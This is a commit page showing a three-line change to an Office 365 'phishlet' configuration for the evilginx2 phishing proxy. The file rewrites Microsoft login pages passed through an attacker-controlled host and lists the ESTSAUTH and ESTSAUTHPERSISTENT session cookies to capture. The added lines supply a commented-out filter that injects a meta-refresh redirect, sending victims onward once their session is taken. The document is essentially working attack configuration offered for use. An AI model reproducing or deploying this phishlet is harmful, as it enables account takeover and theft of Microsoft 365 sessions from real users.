Fix for redirect_url

Current evilnginx2 doesn't trigger the redirect correctly and JS injection doesn't work. Added workaround in plugin to allow a redirect.
ss23 · Feb 2, 2021 · 5d41490 · 5d41490
1 parent a799c1d
commit 5d41490
Showing 1 changed file with 3 additions and 0 deletions.
diff --git a/phishlets/o365.yaml b/phishlets/o365.yaml
@@ -17,6 +17,9 @@ sub_filters:
   - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
   - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
   - {triggers_on: '<insert-adfs-subdomain-and-host>', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
+  # The `redirect_url` does not work properly on O365: https://github.com/kgretzky/evilginx2/pull/178#issuecomment-463380284
+  # Uncomment the following line and set your desired redirection URL in the field for <insert-redirect-url>
+  #- {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: '<title>Working\.\.\.</title></head><body>.+</body>', replace: '<title>Working...</title><meta http-equiv="refresh" content="0;url=<insert-redirect-url>" /></head><body></body>', mimes: ['text/html']}
 auth_tokens:
   - domain: '.login.microsoftonline.com'
     keys: ['ESTSAUTH', 'ESTSAUTHPERSISTENT']